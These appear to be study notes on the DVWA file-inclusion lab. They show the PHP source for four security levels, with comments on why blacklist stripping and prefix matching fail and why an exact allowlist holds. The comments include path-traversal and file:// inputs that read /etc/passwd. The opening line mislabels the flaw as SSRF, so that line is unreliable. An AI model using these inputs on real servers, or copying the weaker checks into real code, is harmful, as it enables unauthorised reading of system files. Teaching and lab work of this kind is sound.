是一种SSRF漏洞
Low
// Very simple: the query-string value is assigned to $file as-is, with no
// validation at all, so the caller controls the whole path.
// e.g. http://192.168.32.114/vulnerabilities/fi/?page=../../../../../../etc/passwd
// The page we wish to display
$file = $_GET[ 'page' ];
Medium
// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation, blacklist style: strip URL schemes (so http/https
// sources are refused) and traversal sequences from the request value.
// str_replace() applies each search string in turn, so one call over the
// combined list behaves exactly like the original pair of calls.
// NOTE(review): as written here "..\"" is an escaped double quote, i.e. the
// literal .." rather than ..\ — confirm against the upstream source.
// Stripping substrings is not a sufficient control: an absolute path such
// as /etc/passwd contains none of them and passes through unchanged, so an
// exact-match allowlist is the robust fix.
$file = str_replace( array( "http://", "https://", "../", "..\"" ), "", $file );
High
// The page we wish to display
$file = $_GET[ 'page' ];

// Input validation: accept any value matching the glob "file*", or the
// exact name include.php. fnmatch() only constrains the prefix; the rest
// of the string is unchecked, which is why the page notes that
// file:///etc/passwd and file123123/../../../../../../etc/passwd both
// satisfy it. A pattern check is not a substitute for an exact allowlist.
$is_allowed = fnmatch( "file*", $file ) || $file == "include.php";
if( !$is_allowed ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}
Impossible
// The page we wish to display
$file = $_GET[ 'page' ];

// Only allow include.php or file{1..3}.php — an exact-match allowlist.
// Tedious to maintain when pages are added, but nothing the developer did
// not explicitly list is ever accepted, which is the safest option here.
// in_array() with the default loose comparison reproduces the original
// chain of != tests; passing true as the third argument would make the
// check strict, the stronger idiom for new code.
$allowed_pages = array( "include.php", "file1.php", "file2.php", "file3.php" );
if( !in_array( $file, $allowed_pages ) ) {
    // This isn't the page we want!
    echo "ERROR: File not found!";
    exit;
}